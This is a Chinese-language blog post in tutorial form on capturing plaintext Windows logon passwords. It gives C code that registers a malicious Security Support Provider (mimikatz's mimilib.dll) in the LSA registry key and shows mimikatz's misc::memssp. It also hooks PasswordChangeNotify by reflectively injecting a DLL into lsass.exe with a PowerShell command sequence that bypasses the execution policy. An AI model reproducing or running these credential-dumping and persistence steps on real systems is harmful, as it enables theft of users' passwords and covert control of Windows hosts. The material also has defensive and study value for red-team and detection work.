Drunkmars's Blog

关于抓取明文的探究

字数统计: 1.7k阅读时长: 6 min
2021/12/05

我们知道在win2012之后微软更改了策略,在默认情况下是不能够抓取明文密码的,那么有两种方式来绕过,分别是SSP和Hook PasswordChangeNotify。

基础知识

SSP(Security Support Provider)是windows操作系统安全机制的提供者。简单的说,SSP就是DLL文件,主要用于windows操作系统的身份认证功能,例如NTLM、Kerberos、Negotiate、Secure Channel(Schannel)、Digest、Credential(CredSSP)。

SSPI(Security Support Provider Interface,安全支持提供程序接口)是windows操作系统在执行认证操作时使用的API接口。可以说SSPI就是SSP的API接口。

在微软官方中对于Security Support Provider的解释如下所示

image-20211203161329704

SSP

我们知道lsass.exewinlogin.exe进程是用来管理登录的两个进程,都包含在LSA(Local Security Authority)里面,它主要是负责运行windows系统安全策略。SSP在windows启动之后,会被加载到lsass.exe进程中,那么就衍生出了两种思路:

第一种思路就是删除一个任意的SSP DLL以便于与lsass进程进行交互,第二种思路则是直接伪造一个SSP的dll来提取用户登录时的明文密码

我们首先尝试对注册表进行修改,这里对应需要修改的注册表为HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages,在mimikatz里面根据不同的系统位数提供了对应的dll,这里我们直接修改注册表里面的值即可

首先我们尝试一下任意位置直接加载dll,写一个修改注册表的代码,主要是使用RegOpenKeyWRegSetValueExW这两个api来实现

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
DWORD InjectSSP(LPWSTR filepath)
{
HKEY hKey;
LPCWSTR KeyName;
LPCWSTR ValueName;
DWORD dwDisposition;

KeyName = L"SYSTEM\\CurrentControlSet\\Control\\Lsa";

if (ERROR_SUCCESS != ::RegOpenKeyW(HKEY_LOCAL_MACHINE, KeyName, &hKey))
{
printf("[!] The key is not found,the registry entry creation operation is performed\n\n");

if (ERROR_SUCCESS != ::RegCreateKeyW(HKEY_LOCAL_MACHINE, KeyName, &hKey))
{
printf("[!] Create regedit failed, error is:%d\n\n", GetLastError());
return FALSE;
}

else
{
printf("[*] Create regedit successfully!\n\n");
}

}
else
{
printf("[*] Find the key successfully!\n\n");


if (ERROR_SUCCESS != ::RegSetValueExW(hKey, L"Security Packages", 0, REG_MULTI_SZ, (BYTE*)filepath, (::lstrlenW(filepath) + ::lstrlenW(filepath))))
{
printf("[!] Create key-value failed, error is:%d\n\n", GetLastError());
return FALSE;
}
else
{
printf("[*] Create key-value successfully!\n\n");
}
}
}

这里我把mimilib.dll放到C盘根目录下

image-20211203213259905

注意一下这里需要用管理员权限启动否则会添加失败

image-20211203213354449

可以看到这里我们已经修改成功

image-20211203213439010

这里新建一个test用户来进行测试

image-20211203213538112

当用户再次通过系统进行身份验证时,将创建一个名为 kiwissp 的新文件,该文件将记录帐户的凭据。默认情况下在以下路径

1
C:\Windows\System32\kiwissp.log

但是这里没有成功,可能是路径的问题

image-20211203213735227

这里把mimilib.dll放到C:\Windows\System32文件目录下

image-20211203213950881

修改注册表为mimilib.dll

image-20211203214110887

在重新登录用户之后,就能够在System32目录下找到kiwissp.txt的明文文件

image-20211203215116342

因为是登录就加载,所以如果想要删除只能清除注册表之后进行删除

image-20211203220002498

另外mimikatz提供了一种更方便的方法,直接使用misc::memssp命令来直接注入,但是有一个缺点就是在重新启动之后不会持续存在

image-20211203220447644

当用户再次通过系统进行身份验证时,会在C:\Windows\System32\mimilsa.log里面记录下明文密码

image-20211203220631619

Hook PasswordChangeNotify

在上面的两种方法里面,都有或多或少的优缺点,在第一种方法中需要放置dll到system32目录下且需要修改注册表,但重启之后仍然有效,第二种方法虽然不需要直接修改注册表和放置dll,但是重启之后就会失效,而且使用mimikatz也需要考虑对抗杀软的问题。在这里有一种更方便且更隐蔽的方法就是hook PasswordChangeNotify这个api。

在修改密码时,用户输入新密码后,LSA 会调用 PasswordFileter 来检查该密码是否符合复杂性要求,如果密码符合要求,LSA 会调用 PasswordChangeNotify,在系统中同步密码。这个过程中会有明文形式的密码经行传参,只需要改变PasswordChangeNotify的执行流,获取到传入的参数,也就能够获取到明文密码。

image-20211203222002413

还需要了解的相关背景知识如下:

  1. 函数PasswordChangeNotify存在于rassfm.dll
  2. rassfm.dll可理解为Remote Access Subauthentication dll,只存在于在Server系统下,xp、win7、win8等均不存在

我们知道了在LSA调用PasswordChangeNotify的过程中密码是以明文的形式传输的,这里我们就可以通过Inline Hook的方式使用jmp跳转到我们自己的处理函数中,读取密码之后再还原到原地址继续传参。

这里已经有前辈写好了Inline Hook的代码:https://github.com/clymb3r/Misc-Windows-Hacking/blob/master/HookPasswordChange/HookPasswordChange/HookPasswordChange.cpp

我们简单的分析一下写的代码,首先创建一个vector容器,修改硬编码指向PasswordChangeNotifyHook函数的地址

image-20211203225515872

首先保留rbx、rbp、rsi三个寄存器的值到堆栈里面,然后将字节码写入内存并还原被覆盖的指令,再跳转回原函数

image-20211203230107869

然后再看下读取密码的这个函数,如果获取到密码,则在C:\windows\temp目录下创建一个passwords.txt来储存密码

image-20211203231912624

这里使用session0注入来将dll注入lsass.exe,使用到ZwCreateThread这个内核函数,因为用一般的注入方式是不能够往系统进程中注入dll的。这里可以看到已经将我们的这个dll注入了lsass.exe进程

image-20211204110950463

这里去更改一下密码

image-20211204111605327

这里进行Inline hook之后应该是会把在传输中的明文密码保存到password.txt文件里面的,但是这里在目录下却没有找到,删除dll的时候也显示已经被打开,即已经注入到了进程空间里面,这里去搜索引擎里面看了一下,师傅们基本上都是使用的ps反射加载的方法来把dll注入到进程空间里面,而使用直接加载dll的师傅都没有成功抓取密码,这里研究半天也没搞出个所以然来,还是才疏学浅了。

image-20211204150211488

那么这里我们再使用反射加载的方式进行尝试,利用Powershell tricks中的Process Injection将dll注入到lsass进程,项目地址如下

https://github.com/clymb3r/PowerShell/blob/master/Invoke-ReflectivePEInjection/Invoke-ReflectivePEInjection.ps1

这里首先更改powershell的执行策略为可加载脚本,再执行命令

1
2
3
Set-ExecutionPolicy bypass
Import-Module .\Invoke-ReflectivePEInjection.ps1
Invoke-ReflectivePEInjection -PEPath HookPasswordChange.dll -procname lsass

QQ图片2021144

修改密码过后即可在目录下看到抓取的明文密码

image-20211204152414149

参考

参考自hxd@SD的浅谈无需修改注册表抓取明文密码

CATALOG
  1. 1. 基础知识
  2. 2. SSP
  3. 3. Hook PasswordChangeNotify
  4. 4. 参考